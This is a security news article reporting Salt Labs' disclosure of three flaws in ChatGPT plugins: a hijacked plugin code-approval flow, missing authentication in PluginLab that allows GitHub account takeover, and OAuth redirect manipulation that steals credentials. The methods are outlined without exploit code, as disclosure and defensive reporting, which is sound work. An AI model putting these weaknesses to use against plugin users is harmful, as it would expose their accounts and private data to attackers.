Security
Headlines
HeadlinesLatestCVEs

Headline

ChatGPT Plugins Exposed to Critical Vulnerabilities, Risked User Data

By Deeba Ahmed Critical security flaws found in ChatGPT plugins expose users to data breaches. Attackers could steal login details and… This is a post from HackRead.com Read the original post: ChatGPT Plugins Exposed to Critical Vulnerabilities, Risked User Data

HackRead
#vulnerability#web#google#git#oauth#auth

Critical security flaws found in ChatGPT plugins expose users to data breaches. Attackers could steal login details and access sensitive data on third-party websites – Update your plugins now and only use extensions from trusted sources to stay safe from AI-driven cyber threats.

Salt Security, a leader in application programming interface (API) security, has discovered critical security vulnerabilities within popular plugins of OpenAI’s AI chatbot ChatGPT. These flaws may allow attackers to steal sensitive user data and gain unauthorized access to accounts on third-party websites or data retrieval from Google Drive.

This means ChatGPT plugin functionality, now known as GPTs, could be an attack vector, allowing vulnerabilities to access third-party user accounts, including GitHub repositories, and letting bad actors gain control of an organization’s account on third-party websites and access sensitive data.

For your information, ChatGPT plugins (exclusively accessible for users with a GPT-4 model, requiring a ChatGPT Plus subscription for utilization), are designed to enhance the chatbot’s capabilities by enabling it to interact with external services and be applicable across various domains. However, while using ChatGPT plugins, organizations may inadvertently permit them to send sensitive data to third-party websites and access private external accounts.

****Three Vulnerabilities****

According to Salt Labs research shared with Hackread.com ahead of publication on Wednesday, the company discovered three vulnerabilities within ChatGPT plugins.

****First Vulnerability****

The first was within ChatGPT itself, where users are directed to the plugin website to receive a code to be approved. Attackers can exploit this function to deliver users a code approval with a malicious plugin, allowing them to install their credentials on a victim’s account. Any message written in ChatGPT may be forwarded to a plugin and the attacker can then access proprietary information.

****Second Vulnerability****

The second vulnerability was identified in PluginLab, a framework used to develop ChatGPT plugins. Salt Labs found that PluginLab doesn’t implement proper security measures during the installation process, hence, allowing attackers to potentially install malicious plugins without users’ knowledge.

Since PluginLab did not authenticate user accounts, attackers can insert another user ID and gain a victim’s code, leading to account takeover. One affected plugin, “AskTheCode,” integrates between ChatGPT and GitHub, allowing attackers to access a victim’s account.

****Third Vulnerability****

Another vulnerability was OAuth redirection manipulation, allowing attackers to send malicious URLs to victims, and steal user credentials. Many ChatGPT plugins request broad permissions to access various websites. This means compromised plugins could potentially steal login credentials or other sensitive data from these third-party websites.

Following responsible disclosure practices, Salt Labs’ researchers collaborated with OpenAI and third-party vendors to promptly address issues before their exploitation in the wild.

This research highlights the growing prevalence of AI and its potential security risks. In January 2024, Kaspersky discovered over 3,000 dark web posts where threat actors discussed exploiting AI-powered chatbots like ChatGPT for developing similar tools to conduct cybercrimes.

Recently published Group-IB’s “Hi-Tech Crime Trends 23/24” report shows a surge in the use of AI by cybercriminals, particularly for stolen ChatGPT credentials, which can be used to access sensitive corporate data. Over 225,000 infostealer logs containing compromised ChatGPT credentials were detected between January-October 2023.

Therefore, users are advised to carefully review permissions, only install plugins from trusted sources, and regularly update ChatGPT and plugins. Developers should address code execution vulnerabilities to safeguard user data. PluginLab developers should implement robust security measures throughout the plugin development lifecycle.

  1. OpenAI’s ChatGPT Can Create Polymorphic Malware
  2. Malicious Abrax666 AI Chatbot Exposed as Potential Scam
  3. Malicious Ads Infiltrate Bing AI Chatbot in Malvertising Attack
  4. Following WormGPT, FraudGPT Emerges for AI-Driven Cyber Crime
  5. Researcher create polymorphic Blackmamba malware with ChatGPT

HackRead: Latest News

Azure AI Vulnerabilities Allowed Attacks to Bypass Moderation Safeguards